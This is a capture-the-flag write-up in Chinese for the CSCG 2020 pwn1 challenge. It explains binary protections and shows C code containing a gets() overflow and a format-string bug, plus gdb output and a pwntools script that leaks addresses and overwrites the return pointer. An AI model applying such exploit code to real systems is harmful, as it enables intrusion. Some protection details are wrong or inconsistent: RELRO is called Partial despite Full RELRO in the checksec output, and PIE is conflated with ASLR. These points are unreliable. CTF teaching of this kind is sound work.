Intro to Pwning ——CSCG 2020

**

PWN1：

**

root@ab31efd2b02f:/pwd/pwn1# checksec pwn1
[*] '/pwd/pwn1/pwn1'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

PIE：

PIE机制，在windows中被称作ASLR，即地址随机化。PIE在linux中作为内核参数存在，可在/proc/sys/kernel/randomize_va_space中找到其具体的值，0、1、2三个值代表不同的工作强度，具体如下：

• 0 - 表示关闭进程地址空间随机化。
• 1 - 表示将mmap的基址，stack和vdso页面随机化。
• 2 - 表示在1的基础上增加栈（heap）的随机化。

NX:
NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。
在windows下，相似的保护措施是DEP。Linux中这个保护特性常被用于和PIE一起使用。

Canaries:
在windows操作系统中，这一机制被称为gs机制。实现方式是类似的，即在函数的返回地址前加一个cookie检查，在linux中被称为Canaries。gcc在4.2版本中增加了-fstack-protector来使用这种保护方式，若要禁用栈保护，则应使用-fno-stack-protector。对栈空间的保护在gcc中是默认开启的。
Canaries的产生方式是随机的，即从fs寄存器的0x28偏移处获取，而fs寄存器是被glibc定义存放tls信息的。这里pwn1挑战没有堆栈cookie的限制.

RELRO:
在Linux系统安全领域数据可以写的存储区就会是攻击的目标，尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.
GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由linker指定binary的一块经过dynamic linker处理过 relocation之后的区域为只读.
设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。

pwn1.c,其中比较关键的几个函数：

void welcome() {
    char read_buf[0xff];
    printf("Enter your witch name:\n");
    gets(read_buf);
    printf("┌───────────────────────┐\n");
    printf("│ You are a Hufflepuff! │\n");
    printf("└───────────────────────┘\n");
    printf(read_buf);
}

void AAAAAAAA() {
    char read_buf[0xff];
    
    printf(" enter your magic spell:\n");
    gets(read_buf);
    if(strcmp(read_buf, "Expelliarmus") == 0) {
        printf("~ Protego!\n");
    } else {
        printf("-10 Points for Hufflepuff!\n");
        _exit(0);
    }
}

这里使用了gets函数，这是一个缓冲区溢出漏洞， 随后有一个printf(read_buf)，这是一个格式化字符串漏洞，AAAAAAA函数中又有一个gets()，有一个思路就是想办法通过printf泄露return pointer然后gets()覆盖return pointer。
尝试找到它：
找到包含system的函数位置
gdb-peda$ p WINgardium_leviosa $1 = {} 0x55a8a28a99ec

找到return pointer的位置：

   0x55bf48c2faf2 :	leave  
=> 0x55bf48c2faf3 :	ret    
   0x55bf48c2faf4 
:	push   rbp
   0x55bf48c2faf5 :	mov    rbp,rsp
   0x55bf48c2faf8 :	sub    rsp,0x10
   0x55bf48c2fafc :	mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7ffd2ad78ca8 ("cnaacoaacpaacqaacraacsaactaacuaacva")
0008| 0x7ffd2ad78cb0 ("cpaacqaacraacsaactaacuaacva")

exploit1.py

from pwn import *
import os

FORMATSTRING = "|".join(["%p" for _ in xrange(0,42)])
MAIN_TO_WIN_OFFSET = 0x135
#p = process('./pwn1')
p = remote("hax1.allesctf.net", 9100)
p.recvuntil("Enter your witch name:")
p.sendline(FORMATSTRING)
LEAKS = p.recvuntil("enter your magic spell:").split('|')
MAIN = int(LEAKS[-4],16)
log.info("eaked return value: 0x{:x}".format(MAIN))
WIN = MAIN - MAIN_TO_WIN_OFFSET

RET = WIN+0x36
PADDING = "A"*cyclic_find("cnaa")

p.sendline("Expelliarmus\x00"+PADDING+p64(RET)+p64(WIN))
p.interactive()